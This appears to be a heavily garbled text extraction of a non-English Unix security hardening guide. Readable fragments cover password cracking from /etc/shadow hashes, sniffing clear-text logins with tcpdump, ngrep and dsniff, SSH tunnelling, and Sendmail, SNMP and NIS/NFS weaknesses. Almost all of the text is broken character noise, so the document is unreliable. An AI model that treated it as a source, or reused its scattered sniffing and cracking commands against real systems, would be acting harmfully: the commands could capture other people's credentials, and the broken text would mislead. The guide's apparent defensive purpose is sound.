e 'j 4 B / " S1: . W L3 6 # F a 5 HTTP header ("c ) ( E 6 l '\ X 40PHP " 23 - < W L* ("c 5 ) 7 !89 K ; ! C ' 6 )- # % < 25 z 3 1 2 4 ? 5 T G' g a B5# 7 !89 safe 1/ ' PHP h @" ? W 8Q 0 C G X) P I5 ' X 0 < Corss Site Scripting XSS % h @" ? L3 2 http://www.securityfocus.com/printable/infocus/1706 0 5 - Y T)„ W L3 2 " ,G mod_Security B5# 7 !89 -,6 Injection SQL&XSS % < R4 S @ ^ 0 5 - Y 1 )„ " - Y DY/ ;! 
, 0 5 - Y &'( F " ? 59 T L. # : ) &5 2 0 56 &K/ & # _ http://www.cirt.net/code/nikto.shtml h @ 0 <@ http://www.modsecurity.org/ 6 6& " ? ) CGI % H] Nikto )j 4 6& 2 P 1Account 7R T 2 9P % G $? ,K ,6 3 N $? 6 <) 6, ) Q0 b ,K f ) T) , -,< K P! 6& $ C 5 h/ 7R T <) $ P !& " - Y !89 $- 6 )? ) % ' DY/ I ?@" 0 6) 6 '-,< d * ,6 * E + + ?@ " - Y ?# $? H $-,< - P , K " U4 0 < 6" E ) 7 " F $ -,< , K + ?@? "E 1G'$ SB g $ -,< , K + ?@? "E 1G'$ SB g , KF) , ?@ (E DZ H$ E N`6?), ) ?@ =GX ) ) /j ) R 0, < ? " b P !& : P! & ^P < TP, -,< K 6account Y 6% 4" 75 I # u P! F) 2 ) X$ 5 - Y , N) = G 0 < 3\ P ? " € + " ? " % < P !& • -,< = G Account P !& 6& " ? S • DY/ (,! 0-,< = G , account E ?# $ F ,H ') = GX 6 &'( 4 5! , B <R hashing , " -,< & ) -,< N -, @ DY/ 2 N1 S P 3 h 83 ( '$ hash , / < ,6 3 SB g F) 2 )b P! & • N1 $ hash )E $ -, < 3 < $_ ?@ ,6 • 6' P! & Hashing ) ) , , Hashe , 0 N& ] P ! )% ! 0, 5 , / B 5! -)8! + 2 1 ), ) 2 $ , 6-, 4, -, < 2), " I' 6 1G' P ! & ,H ' ) = GX account P ! & ,H ' ) = GX 6& ( #. - < \ ' i: 21 ) a 0 •c H ,F 7 , , e G - 5 account R4 S @ ^ ,6 3 !89 0,6 ,F , , , % ! 9 " )- ) -, ) , K " U4 ? @]0,< 0_ F ) -, < = G U 4 ,< 1G' # , P !& 2 " U 4 ?5F ,63 P [?@ , -,< P ! & 2' + H 5 $ ?# 3 1 ) - 3• 6% 5G1 $ F ?@ - , 5 ,H 6& " - Y 0 P! & )d* 7 P !& ? " S d GP$ P! & ) ( #. 2 = G W L3 ("c &'( ). / ) User ID & h ?@ ? ,K, @ ' 0 ? ) ,G ? $, 5 DY/ , 2 P ! 6account , , ,F ? " F <d * 6 'F ) " - Y < , ) " g@ S P! & # )- b hash ) 6 'hash d * ?, N ], 5 I 5 MD5 crypt 5 , H • Y% P !& ? ?@ " : 5 $l ' ,6 3 %. ? , K ?# " etc/shadow % '0, P! & " 2 0_, (E ? 5 - 3• 6 2 1 & !89 6% 'V < K6U ) I5 - 3• I 5 etc/shadow u -, N10 5 - Y & SL b P! l' 6& ? 5 0 I 5 -, < + " H ("c - 3•) hashes N1? 0 3 A8 $ cracker C ' - Y hashes S 4 /etc/passwd % '?, 3 F 3 % H root 3 - 3•W L3 ?, 3 ?# ) 2 #< N1" S " 5 b 6account # B . b < # P !& ) /etc/passwd F) #P< ? ?5F ) ? " #P< I 5 ? 5F 5 L hashes /etc/shadow BH 0, < b P! & P ! 0 &'( )3 45 678 ) -,< <R V < !89 + ) ,< K6account " # - Y 6& " ? 
'& , < h, / % H 6 ,6 3 , , 2 e G < #40 0 1 !" )% ! !" H ("c 25 g_Network Information System^ NIS , NIS / 0 ! 5E % < ) 6 ' #P < ,G , (Mapping) U ) ?# 7 !89 ) - 5 %5! 6U ) H Network File System (NFS) , 6, hash P ! P ! % < NIS , 6& #4 6& C 85! ) 6 '? ) NIS+ P! * ]l ' 6* , %# ), !89 I #P< 6U ) 3 6 ? @ ?, 3 ?# , - 4 , ,F 6 * 6& " 6% '$-, @ %5G / 9 5 I $ NIS " -, < " N ], <P hashes F ^ ("c ^ P 2 )- 0, H,, e G C 5! LDAP ("c ( #. # 4 ) I 0_ , u -, ?@" - Y , F SL b l 'b < # 2 56) - %# $_, ,F 6 0, 5 -, < " ,6 3 F) F) $ ) etc/shadow b 47 # ' b P !& =GX a I - < $, - 5 V 5 ,H ? j4 - Y N ,G 3 $l ' # ) 0,< 1 ), 5 ? , 0, 5 - Y : c 5G C 6U ) #4) ) )S P ! ) N ("c 4 5 6 GP $ ) X - 5 6& 7 L " %/ P ! 6& =GX % < SF ("c ? , b 0? " % )= ! 5E SL g 6U ) , <P G? 9:; 678 )2 - b " P ! & ,H ' % 6%5G1 a,<P S 6 e ' \'2 P 5/ $ 5 SL 7 B 5! # &'( )$,% " 6 " )% ! K6account ) 6account ("c ) - 5 6U ) < 6? " #P < )% ! b 2 g )? ," % , ^ 2 9 / I'. : 6A) " : ) X g L 6& ? < TP, & ) = GX e 'j 4 7 P! ) h, / ? # $ , account ? 5 TG' g ^ $ #P< ) ! 5E 6& d * 3? " 6SL 0 , P ! hashes #. 5#. ? @ ( #. K S &' * " - Y ? P P ! d * N F- 5 $, < -, < 3 < 5B A" @ $ 6? " ?@ )- -J ) " 3? 6 P! ! M) / ) ,! \X ) 5 $O 3 P !& ? ("c 2 I 'L c 9 < 6& P " %5 Q O* N F2 0 <- 0 , K5 = G 3 -,< 3 < ( B' ( ) " )@ ( $O W 3 (E * - 93 ?@ d * $ & " $ " " U (8! 6& ,1 <P?@ " I 5 ("c % 5G1 " ? T ("c A" 6 #) h &N F E P 785/ ?, < F 7 H? - - < # 2 ?@ _ H I ("c 0 )@ ?" 2 ), " U 4 0_‚ , P4 ) 4 " ? 59 ] " ) -,< 1 ) K5 - 3• -, < F I5 ? I5 @ ? !$7 P ! 6& 3•" M, 6] , <P %# $ -, < = G 6 % 5G1 P! P !& " ) - 3• P ! %5 # / ) 5B E ) O * W L3 5 MR/ $ 5B -J) password d * 6& P = G _pa$$w0rd], 5 - 6 -,< Y P !& $_ -J ) M) / ) KP Y1M) / " ("c Y 3 M) / • ,G 6& O* , , 0_? @ =B* P! $ 5B 6M / 2 1 ) 2' ] ) # : 0, < ,6 3 crack $ 0,< -,< h PH (E ],< "password" ( K6 P! SB g 0 = G - . W L3 2 ? H& " 6 P !& 2 M) / % ,P ( ,H C ' A) 6A) " - Y ,6 3 785/ " \ 2 KP Y1M) / " I5 ) - 5 )6? " ?@ " ,G 0 ' ? "W L3 ) P !& d * " - Y ) ,G • " ? 59 6? ' T /2 ! <) " S ) ( #. P !& 7 B 5! 
$ & @ P 785/ ( 6 6& ( E 0 5 crack 2 P !& $ T#< A" @ ) S ,G PF 62 ) T 5! " U 4 P! 6& . 2 & 2 0 % 5! " U 4 P ! 6& Npasswd " , 6 U : -, < d * 6 * 6 0, 5 - Y . 7 ]Cracklib " , * ?), ? , - <\ X ) 6 P ! $ I5 I # 0, 5 F) Enabled , crak ?@ 6& 1/ Cracking C, E P! ("c , < 5 $? " ,< P '7 B 5! ? ("c 6" E 0 ( E -, < 6& ("c v 4 & _ E 2 " 6& O * - . W L3 +H ) F u 5 John the Ripper , (4lc4)10 phtcrack version K6 P! 7 6& ? G ) stand-alone - Y cracking " - Y $= GX b & PAM-Enabled P ! 2 ) u P !& #P< ) L $ P !& % 7 K " U4 ? " , " DY/ 2 < Q0 6 N " U4 0 5 b 6% 5G1 I K6 & " - Y ?# ? , " ("c " E S S 6 - Y -,< ? ) Npasswd 5 l' 6 ) ("c F N656 I 5 ("c , PAM- S 1) U# Q 0, 5 - Y _ Crack $ E 0 6%5G1 ) A & l ' GX) )C3 0 "] K ? @ I $? ,K & S I5 N K <) 0 hashes 0 P! 6& # 0 #. - Y etc/shadow/ " F) hashes I 5 A8 ) hashes " - Y W L3 \ 2 # - 5 (N P ! 6& ("c " 0 3 P : (E 2 LDAP ) NIS 6" E $, -, 2 &N F 25 6 & ) 25 9 6" E - 3•/etc/passwd ) NIS ?, 6 ) $, -, # H 6$, < 0 , 6 3 ? @ cracking 6* 5 • DY/ $, Z F LDAP DY/ ? # 6& -,< " ) < 25 F) 25 2&N F 25 <, 6 & g 9 6 - Y % 4 : - Y MDS N1" 2 0 - Y 6& ? 5 hash P ! 5 7 L N I 5 Crypt 5 ,H N1" 0 b ? @ 0 DY/ (, ! 7 ' ,63 ? $, < , 5 ,H ) #. H, , e G A" @ I 2 < (, ! $ N DY/ ) ,< P! & < 4 P! & " %P H)S 6& ? P ! 6& : 2 0 1E E 6 N4 W 3 K6 2 ) ) ) X 62 ) " 0 V ? " , ?@ % has expired O* 3 K6( 4 2 ` • P $ 5 - Y ?@ " , account 60 P ) 5#. ) , ,F P! & u 7 ) X ) _ ' L 7 L -,< , 1 ] 1 ) B 1 $ 6 ) ' H , P4 : 2 )? ) ("c) ( E ^P P ! N 1 -,< , K 3 - 56) " P ! & log in 2 1 ) , & / ? 59 ?@ ? # 54 "2 I K6 K6account MR/ ) 1 P! 0 B' 4) K T ) T G' g 6account &5 0 < +H ) , Y ) P! & A" @ ? 6A" @ ? U) : 6& <- $, 5 , ,F 6account , # 4 0,< ? b %L K ("c - Y ?@ " DY/ B . SB g 0 ("c 2 ) " ?# 7 0 6& P ! , account 60 account P ) $? , Y 5! ( 5 -, 6, ' 0 MR / P ! ?@ ?, 3 ?# ? / P $S K (,! 0,<P F $ 6& 6 B 5F " , -,< - 3•?@ P !& U) % < F) ? N Your password 3 F B 5G1 , <P = GX ? " ("c ' P ! 6& ) P -,< 6account ? 
)&' I 5 - 4 $,< (N " 5 ?@" - Y 3 nB G account MR / 0 "% I ' 3 - Y $, - 5 Clear Text Servies 7 L $ U# $ P N& =GX 0, 5 ?# P !& 6 -,< - Y 5 - Y ?5F 3 6- I? telent ) FTP bP 7 !89 d * 2 2 F ?# $S ? 5F b N )( d * 0 , <, 6 3 Clear 7 2 _ L 7 !89 text plain " )- , b !89 SL <] -,< U# < ?# b ' ,B )- 6 " R4 S @ )@ +5F a,6 3 6N 6- #P < 6U ) ? , ) ))7 L $ -, 6 U ) -,< - . _login 7 !89 ] $ F <d * 0, 5 !89 I 5 8Q 0 )@ , 6 3 , 6 3 plain- text 7 !89 " ,G ) -,< E ^ P 7 6v 4 ) ? , 6' ,5! ) - Y $ sniffer -, < K 2, SB g 0 N& h / 7 !89 ) #P < 6U ) " ) 6 ' _ #P< ' -,6 ] bP B . #P < 6U ) " _ ) N6 ] 3 785/ ) 6 P! & 3 1 " T),F $, 5 1P $ Text U) Clear 7 4 Clear Auth 1 @ Content FTP 21,20 Yes Yes $2 TFTP 69 Yes N/A $2 telnet 23 Yes Yes 2 SMTP 25 Yes N/A $2 Pop3 110 Yes Yes $2 rlogin 513 Yes Yes 2 HTTP 80 Yes Yes $2 ? 6, K , 6 3 TP, ? ^ 2 c h / F$2 6- FTP ) Telnet I K6U ) T L 7 !89 $ , < " ,E - Y 2 7 , 6U ) < TP, b $ P !& clear text 7 , 0, 5 Z F $ , K F$ ) - " 2 ‚ / T3 - Y ? 5F Clear text I ?5F -)8! , 5 ? @" - Y 0,< 7 !89 % < &1?), % a I YB* 7 , , 7 !89 d * )$ < $ ,L -, < K 6* 5 Free/OpenBSD j 0, 5 SL 6U ) ) 2 3@ ^ l ' 6U ) "2 $: " 3 6U ) ] l ' R4 S @ : d * ? 5F b _sniffer] -, < - Y 0 1 !" 6& 6 ZQ 5 5 ]U 1) U# $ e 'j 4 7 L $ _,< !" clear 7 5 ) FTP )telnet ] T) , 2 I ", ) " $-, < K U# 5 0_, <P )( 3 - *1 7 $785/ ( E - Y text Clear < L 7 +. / 0, 5 0 0 &'( )3 45 678 I 5 A) 2 &'( 2t5: ) 2 [ # $ _text ? 5 T G'- . 0 5 - Y tcpdump $ "2 " 7 L clear text ^ P a F 2 1 ), 0 6d * I 5 $l ' #tcpdump-X-s1600 5 - Y & ngrep a assword 6 ' #P< -, ' - .0 I I N ) sername 6 I W 3 K N1 $ 15 / • & M) / 5 - Y " ? " 2 E F ?# $ l ' I 5 $ M) / 21 )] , 5 http://www.packetfactoty.net/projects/ngrep/ 0_ "7 L l' ? 5 TG' #ngrep assword h / 0 6- d * "2 I5 & 2 1 ), 6% # ) 4 ) N \ h @" ? l ' ? 5 TG'- . 0 5 - Y : 2 $ Dsniff 0 5 - Y _ P !& )( ]? P! & ) ( z)" ? @ $ d . " U4 ) ( E 6& " ? 5 W L3 ("c POP3 ) Telnet )FTP ? 
)@ $l' I $ E/ Plain text , 0 , 63j 5 http://www.monkey.org/~dugsong/dsniff/ a "7 L $l' #/usr/sbin/dsniff &'( )$,% level•Link , ,< N& %H ,/ ) End- To- End N, # T G •$ 7 # ) connection 6 N& BH m .1" 6%# ) 4 3 9:; 678 N& " - Y +H ) , Y ? $,< 5 _tunneling] h SSH % H] ) Z F U# )(replaces 6* R 4 M :G ) T) , Q l' -, < " - 4 5 I] N& ( E SSl OpenSSh _ http://www.openssh.org/ h @ telnet,rloging,rsh) ) - " 7 9P 0 "2 _ HTTPS , POP3S K6% # ) 4 ) $ SSH:Secure Shell n 9 " 0 % - Y X11 )(pop3,SMTP I ?@ " ? I K6%# ) 4]tunneling ) 0, 6 2< ? ) connection ) ?@ , POP3 ? 5 tunnel - . Z F & SSH 0 " P POP3 -, 6 U ) a K5 F -, U) #ssh-L110:pop3.mail.server.com:[email protected] - < localhost 7 4$ 6 7 4POP3.MAIL.server.com 7 7 L # ) #1 # ) #1 4 -, 6 U ) 4 -, U) $ ] TCP110 T 5G T) M83 ) 2 < 2 7 9P 5 S 110 2, _ 0 (tunneled over SSH) 0,< ,6 3 ( E -,< & stunnel " - Y tunneling P ) _ openSSL Toolkit " - Y 0 ] " , * plain text 7) Y ' N& T) , - 4 6% / - " N # SSL %# ) 4 $ l 'A) 0 6%# ) 4 ? 5 tunnel 0 5 - Y http://www.stunnel.org h @ " ? I5 ?@ ? l' ' Senmail 6 ? 5 ) ') ' $ T # Sendmail 0 " ? G ?@ " - Y $ 785/ ? (,! : # ) #1 )- )? ? - Y U - 1) 4? ,6U) - 5 ? 5F 5 ,H % 1 , -,< ( E 785/ Q : 2 - 6 SB g # #1 Mail Transfer Agent 2 1 ), - 3 ?1 $ Sendmail I 5 ?@ " - 56 ' # ) #1 6 1 ) M ,6" - -,6 $-,< SL a 5 - < ?@ +" U „@ # Sendmail 0 ^P 6* ,G S 3 785/ " patch 5 2, CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL -CERT ADVISORY CA-2003-07-REMOTE BUFFER - CERT ADVISORY CA-2003-25 BUFFER OVERFLOW IN SENDMIL a 5 -,5! -) ) ? SENDMAIL bP 7 , , ) 7 :3 , , 6 3 BUFFER OVERFLOW ?@ #4) % , PC 8Q], < T) \ 7 , , ") < TP B ! 7" PATCHING (, ! ) e 'j 4 , #4 " Y 7 GP , B % ! 0_ # ) #1 6 S 2' +" ) 5 ,H - 1 @ & 6* 6% '" - Y " - Y () \ 7 , , C,5! B B ! 0 +. / send mail " -, < S L * 0,< - 5 U# )U 1 6* TG'e 'j 4 7 L $l 'U ) !" * K )f , 5 ,H * - ) ' ' j6 ?@ ? 5 d* I 0 1 !" 0, 5 - Y R4 S @ ^ X ! 
Send mail <R HS @e G " 0 0 &'( )3 45 678 6patch ) R 4 S @ ?& $ 9 < ,6 3 5 CP l ' &'( sendmail " , , ,F -, patch * - 5< Echo\$z\usr /lib/sendmail- bt-d0 7Y , $ , #4 F sendmail -, < " ? sendmail -,< d * l' K * 2 3@ " 6 @ , < http://www.sendmail.org/current-releaese.html h @ &'( )$,% 4 sendmail DY/ ) " a $ F 6patch 2 3@ " ) Z * http://www.sendmail.org h @ " ? ] % ! ? , X ! 9 I " %/ F source code patch 9:; 678 25 2 3@ - 5 sendmail * -, < K % ! % ' 0 # ' • * - Y 5 - Y ? $_package 0 5 GF U 1 6 ?@ Q 1G') - P I e 'j 4 7 • L C 5! sendmail mail -, 6 U ) ? ! # @ /] U# ) daemon ) 6 _ ,6 * mail SL ? # _ –bd ˆK ? 5 T G' g]0, K5 T #4 : sendmail sendmail 1/ 2 < ,6 3 etc/mail/sendmail.cf h @ F l ' 62 < F) ? `56l ' 6 # 4 % ' mail reliy , b <( E c 5G ) C ^P # ) #1 P 5 , 0 - < sendmail.cf $ , < ( #4% ' 0 . " " Z F deamon 1/ $ !89 + " ? : 2 sendmail 0 % H • ("c # / ? 596, < ( E , #4 a 5 - Y http://www/sendmail.org/tips/relaying.html http://www/sendmail.org/m4/anti_spam.html T G' g e 3j 4 , 'j 4 7 #4 L open relay ? # sendmail 8.9.0 * ?@ C, E $ % ! 6 ? , - 5 -, < K sendmail * $% ! -, 6 U ) - Y (, !] ( E X !" " - Y 7 W " ,G0,< 0, 5 L3 2 ("c TG' H _realying]0 ("c$_ N -, ? 5 ˆ K ] sendmail , ,F * * , $ 5 ,H * b -, < K $ sendmail , h @" ? , #4 #4 " - Y ? " 6% ' u W L3 ^P 7 K &F " ("c 6@ • , 0 0 5 - Y http://www/sendmail.org/m4/readme.html download ) - Y pgp signature " 9 " " g@ 6* integrity <R Q # * ?), ca-2002-28 h @ " ? ? " E " ? 59 < H 0 <- Y 3O * " sendmail F + ?@ " /S ? " : 2 • # I # 2 $ ("c : 5 sendmail 0 5 source code sendmail B5# 7 !89 2 ' 6trojan I5 0 , 5 , - 5 sigm I 6, B0 5 - Y CERT advisory -, < - Y http://www.sendmail.org/ftp/pgpkevs/ h @ " ? I 5 MD5Checksum " a 5 - Y sendmail ' PGP ?, '7 )@ , 0 - Y sendmail +P , INTEEGRITV " !89 + " ? 
7 !89 S http://www.sendmail.org/secure-install.html http://www.sendmail.org/m4/security_notes.html gshapiro/secu rity.pdf http://www.sendmail.org /~ Simple network management protocol (SNMP) 6- N 5 SNMP" - Y , # 4) ) - " y # I 5 ?@ " 0 < SB g - Y $T - 1 )$ 6Access Point$ 6ˆ K $ 6 ) $ N4 " $SNMP0 < #P < - Y $ #P <y ) SNMP 6N , 6N TCP/IP G - Y SNMP %# ) 4 " I #P< 7) Y P ' 4 6( '784 2 I K 6N , ) , 6N 6- " 2 ( 4 1P I5 ' ) )Y 0, 5 " PG ), K (& # ) -,< 1P ,G * ]SNMP , -, < - Y 6N I 5 -,< - Y B % 6A) 6A) ! B 5F " $ 6 ( 4 bP R4 S @ ^ b 6( 4 3 -, < K (E H$l ' R 4 S @ ^ , ) , I 5 -, < - Y " - Y # 4 _U ) 6 A) " [ ? 5F 0 ? ' 9 SNMP A) " [ , G 7c L. ) - P ),. SNMP" W 3 ,1 b ), K : 6A) - Y R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ? R4 S @ ^ 0 3 3 SNMP R4 S @ ^ 0, < 7 K &F - 5 _ 6( 4 #4 % <& * $l ' ? , " ] DOS \ " 7) Y 785/ SNMP P 7 & E ) 7c@ 2< -, < - Y o SNMP 5 , H ] & ? G -,< & $ SNMP 5 , H 6A) " [ N& S 6* g’ V 6( P e % ! N "$ -, Y SNMP 5 i: j &' I 5 ? , , 1 " < $h / 6- ^ $ SNMP ' ) !89 < TP, I5 _?@ -, < % L 3 M, 6nH ) S * e 'j 4 7 T, " - Y -, < K P 6A) W L3 #P< 7 & E " % /f %1 , : $"), ) F 2 - Y ) ("c , G ) G I 5P ^ u“ L 3 “7 L 3 ) 7 !89 Z ' 25F 0,< ,G ) TG' SNMP 5 SNMP - 5< * $SNMP #4? ) ,< - 5< * d * SNMP0_, * 5 U# 785/ Q $SNMP -, < d * U# ?@ - 5 ) SL SNMP * U T G'e 'j 4 7 SNMP , # 4 6 1) U# % ! 6 L $l '% # ) 4 SNMP l ' R4 S @ : $ P 785/ &1 @ ,, e G )- 6 - Y $ Bridges ) 6point access$ 6 N4 0 0 Q 0, < ^P 3 785/ & c L. $ N ]0, < “V X ! ] #P< Q 0, < K 6T, " - Y ,K " ,G b H$l '7 !89 " - Y , 1 , 5 B!, j & ' ) 6 F j , 4 R4 S @ ^ <0_, 5 O* 6( 4 , K " 5 i: L ? , H 6N 3 ] 6N 6 * 0_78# - Y R4S @^ PG PG ) , K I 5 " $SNMP) ) <’ 'j 4 A N0, < 6( 4 " 4 " 6A) " - Y (,!0, 5 <“ , 6* P 5 SB g 0, #P <% ! 6 0 < ,6 3 =GX 6 ) X ! ) 6N H,, e G R4 S @ d * ? 2 $ #P< -,< %L ) F 5 $ SNScan N 4 6N 0 5 - Y ) SNMPSL A) P ) #5 - . I5 " h @n 0 9" 5 ("c 7, - ? $ ? , 2 E F$? F) N 4 0 I 5 ("c 7 B 5!$SNMP " 1 ("c " http://www.foundstone.com/knowledge/free_tools.html ' W L3 @? 
6 & " - Y ?# (E : 2 SNMPZ&F ) SL 7 L - 4- ." 0 6 @ " U4 GF 9 SNMP? (E # % ! T G'd * 2' 5 ' 2 F)0 (E w•w)w•p 67 4 ) ("c 7 K&F " 6 @ I5 0 b <" 6" F T/ “SNMP“ R4S B1$ SNMP @ 0 5 - Y CERT-2002 03h @" ? # n. 7 a < ,6 3 ? G -, < - Y ] 13 W L3 $SNMPSL ) " H,, )S @e G F)• 'j 4SNMP Community )e _ P ! ") F)• community SNMP Y* F)• 6 < DY/ - . $ l ' R4 S @ : % DY/ I 5 0 5 a-, ,, )? P@ ?@ " - Y 7 ) X (,! 7 N& ) 6( 4 , K I 5 $ SNMPv3 6 3 6, " % DY/ SNMP ? 5 TG' g• P T, " - Y • _? # 7 -, < K patch * j* ? $? , 2 3@ $) , 1 7 L* 6& h,/ % H SNMP coomunity R4 S @ : % D Y/ 7 , H ? 4 * " 6 @ ] 6- SNMP " - Y 7 S L $-, • ,1 b 0 5 GF $ CERT Advisory CA-2002-03 5 5X )TCP/UDP , ^ w•w7 4], K5 SNMP agent K6 9 ),. !89 SNMP 3 b 3 , ? & w•p7 4 6N "• T 2#5 l ' J)0 ("c T $U# B'T) ' " - Y 0 , ^ P A R 4 W L3 ? 5 V8 SNMP• B F) F 3 7 L lYB 5! ? y 6 6- SNMP agentb 6 6 3 $ ) 6 ) TCP-Wrapper P (E 6 % ! agentb ) ) l '7 B 5!0_TCP/UDP ) X # 0 - Y B' #P < ? 6 1 )$,< Q 0 (E ( E xined , & ?& #4 agent ) 0 < +H ) [ h,/ % H DY/ SNMP? 5 TG' g• ?@ " - Y 7 ) X (,! 7 I 5 $SNMPv3 N& ) 6( 4 , K 6 < % P " - Y • T, _? # 7 I5 W 3 " $) ("c 2 0 - Y _ - ),. ) ) 7 L )- ) ( #. 6& ? G -, < - Y ] community P! h,/ % H g & ) 0 @ 3" ? , O* u& ("c : 2 0 (E N "W 3 6 F 7 # " - Y • P ! 6& -, < ' - Y $http://www.sans.org/resources/idfaq/sanmp.phph @ ) TCP/UDP , C ' W L3 • SNMP " - Y 7 * 0, < I ] 6- ^ w•w7 4], K5 B' , ) ) 6- l '7 B 5!0_TCP/UDP ) X # y B' #P < # 40 (E 0, 6 ( E $-,< &5 $ , -,< K SNMP• B ^ w•p7 F) F 3 7 L 6subnet 2 SNMP " E ' 4 6N I5 SSH (Secure shell) % 'T F$Login " )7 l ' * ] OpenSSH &'( 25 " U# P - Y $SSH Communication Security R- ) telnet$ Ftp 6 ,G P 6=GX$ -,< - < * &K/$ ? @ " , ,G ) - ,, 2 5 0 b _ U) $l ' R 4 S @ : _U : F 6=GX Q 0 F) )- 56 ?# $SSH " - Y N5 6=GX ,< F -,< K 7 !89 Q $"), ) ] nix*) "), ) 1 $U# 0, 5 Command P B '8 i: ] #P < SSH # ? `56 1 )$,< K &F 7c #< C ' )? , (, !$ 6 Q0 )_open-source 7 L 5 ( ,H ? @ ? 5 M 9 R 4 S @ 2< ? ,6U) ) 6 E * P $SSH 5! U ) bP 0 ?5F SSH 6b. 
SSH-, < " - 4 6* SSHS %K , ( N ) 6Patch $("c " # ) , #4 0,< , ^P < TP, C L3 3 W 3 78# ) SSH2 K 6% # ) 4 & ) HTTP$U ) $telnet -, < - -, 6 U ) …-, ^ P C $_ SSH2 SFTP U) L3 A" R4S 4 Kc F) ?@ ? # 2 # " @% W SSH2) SSH1 ], < ? # -, 6 U ) ) -, 4 (,! 3d * 6 * R4 S @ , 5 6 &'( F " , G $OpenSSHb & < - < # 2 6& ) clear text 7 L -, L3 2 U) P I $ SSH1 % # ) 40 H session & SSH2 # ) 0_ OpenSSH " 2&N F , 5 ,H]POP3 ? , % 1 2 , 0, < ], N, # @^ 6A) a I ]rhost 6sessionS % # ) 4 " - Y $ #P< ) : R 4S ;! _rlogin) rcp rsh$, K 7 !89 T )- P d * ("c0_ SSH * ("c F) & Z Q OpenSSH ? -,< E 6% 4% CERT 2002-23h @ " ? $ 9 l ' * ] OpenSSH " - 1 @ * I 5 0, 7 K &F " 6 @ pqqp T 0 5 - Y Advisory ) ' 6S @ ;! ) A % 3 6 ? " R 4 S @ (, ! " ? 59 ) : I 5 0, < trojan-horse _ 2 7 !89 S - Y http://www.openssh.org/txt/trojan.advh @ " ? $l '- 1 @ * 0 5 ,, e G -,< K * ]?@ " ,G OpenSSH 3.3 ?@ ) U ) SSH Communication Securitys SSH 3.0.0 % ! 6 1 U# * 6 )_version 3.6.1$pqqp T Z F ) S L _version 3.5.2- 5 < pqqs T -, < K 0 < ,6 3 * ] ?@ " , G HS @2 e G $ R4 S @ d * * R4 S @ W L3 -,< SL U) * ("c - 5< " $“ ssh-v“ ) - " d * 6* $S N 4 ? : ScanSSH * ) R4 S @SSH? , 6 #P < 6h @ K ?@ http://www.monkey.org/~provos/scanssh/h @ " ? ' a 4 6Z 0 5 SL (E - @ 2 3@0, 5 &'( )$,% Patch2 3@ " - Y 0 < &) j 4 ? , 6 U ) -, < K pqqw T 0, 2 & $ ScanSSH0, Patching (,! % 1 , 0,< - 5< ^ P 0 5 F I5 , Y 1 $ ScanSSH :3 " ? - . F " * $l ' R4 S @ : % 2 3@ ?@ ) 0, < 2t5: ?@ * ' 9:; 678 DY/ I 5 )SSH * - 5 OpenSSH )SSH # $,< -,< SL $% ! ) openSSH % % ! -, 6 K " 9 2 3@ SL " $OpenSSH" - Y 7 • SSH1 G : 0, 0,< ? , - * P , TL ) I - * 6 & " 6 -, 6 U ) S! 5 $" E ? ! j &' 0 6A) $?@ I5 ? @ " ? , # 4• U) S 2 0, 5 U) N 4 )• W L* ,K , #4 SSH? , 2#5 -, " I 5 0,6 d * ,Y : 5 5/ rsh 2 NO , $SSH , # 4 % ' FallBackToRsh, B P -)8! S ,6 3 - 4 * )? @" - Y 6 ) ? - Y O B : 2#5 $DES3A) ] L F TL ? " 2` 7 3 5L -, @ ), . ? # 0, 6 ( E 0 0 F) $SSH-,< " 6 2< " - Y ) ) <, ! 5E F 6 & " SSH SSH2 G I # 4, G ), 51 /• SSH2 SSH1 * $ Z - Y DES3% 2, 0_,< -,< ' 3 P ( #. 
N& " • blowfish I 9 * " & -,< ( E e 'j 4 N& $ 7 B 5! 0 1M ( 0 @'U NIS/NFS ) $(Nis)Network information Service)(nfs)Network File System U) Sun ) $ NFS0, < <b #P< F ) V < ? # l 'U ) 6 '• & 6 6 2 " - Y 7) Y 6 % ' I , 6% ' Q ) u T 5! ? # $NIS & 5 maps] 7 u T5! 7 ) X (,!]0, 5 ?# ^ 6% 'V 0 -, ) L*< 6 $ nis0 7 U# 6 #P < I 5 Microsystems < " - ) 4 ) / 9$U# F 2 % 'V < , 6% ' A) $ NFS0 , -,< +" , 0, 5 -,< - Y !89 U) 6 'hosts)passwd 6 '_ !89 ] : 7 !89 K $NISM,62 5 0_ #P < " F 6 I 6 5 group)passwd ? ,K & 5 =GX C 8Q] NFS I #P< 6U ) B'0 I5 ? @ " ,G ? @" , ?5F 3 ?1 ,, e G 6 " H NISb I K6 &'( " - Y I 5 NIS " (& # 0 ? 5F ,K ) 6, " 0,< dos$buffer S ', 6? G F 6- Y/ " - Y Z -, < - Y - Y patching)NIS)NFS 6U ) $S F 6 0 _? F 3 785/ , 63 ) - !89 )- B . 7 3W 3 F - ?5F ) S 6=GX ? H ypcat j 5 P! & +. / - 5 U 0, < 1) U# NFS )NIS " 0 1 !" 6 5 CP TG'e 'j 4 7 L $ l ' 6U ) !" 6U ) : ,F ) ) - 0, < K NIS)NFS " * -, "2 (E R4 S @ 0, - 5 - Y 6U ) )- \ " -, < ( E 785/ Q 0, -, # 4 (, ! 7 % ' $NFS)NIC 56? 5F $ l ' 6U ) , K 6maps] _ I 6=GX , G 785/$ ? @ " - Y overflows - _ < 0, 0 &'( )3 45 678 R4 S @ d * I5 a K6 * 5 0-, ), , e G ,1 b ,< -, -,< K SL ? @ ) F patch 2 3@ " - Y NIS * I 5 0 ' 6 @ -,< SL NFS * j 5 & NFS * 6@ - 5< l ' • patch 2 3@ SL " ? 59 ) rpc.mountd-version - 5 <" 4 6* Q ) -, (N 0 < ,6 3 HS @ - 5< " ? ] 5 - Y ypserv-version " ? 0_ ,6 3 (N R4 S @ ^ 0 R4 7 N 4 " ? $ &'( , ,F 6=GX W L3 , "c a 4 NIS map ? 2 0 F P! a 4 NFS S 6" E ) netgroups$? % ' & ? 7 L -,< 3 I5 , N (,! " ? 59 • 6& " • I 5 cracker " -,< = G 6& ( #. " 5 , # 4 (,! password root 6 0 5 - Y $-,< = G - Y NISS " I5 • R4 S @ d * P ! , # 4 (,! ( N W L3 3 I5 ("c • etc\exports\. ) -, < export " ! -,6 I 5 showmount e F• 0 ?@ 6 R4 S @ : % 4$NIS , # 4 a " ("c N 4]? , U) NIS? , 6 U ) ) 0_NIS -, 6 U ) -, 6 U ) 67 S 2, 0 4 n 9 " ) -, - Y makedbm ^P " ? 5 d* • i ? G 6 TG'Yp-secure U) DY/ - 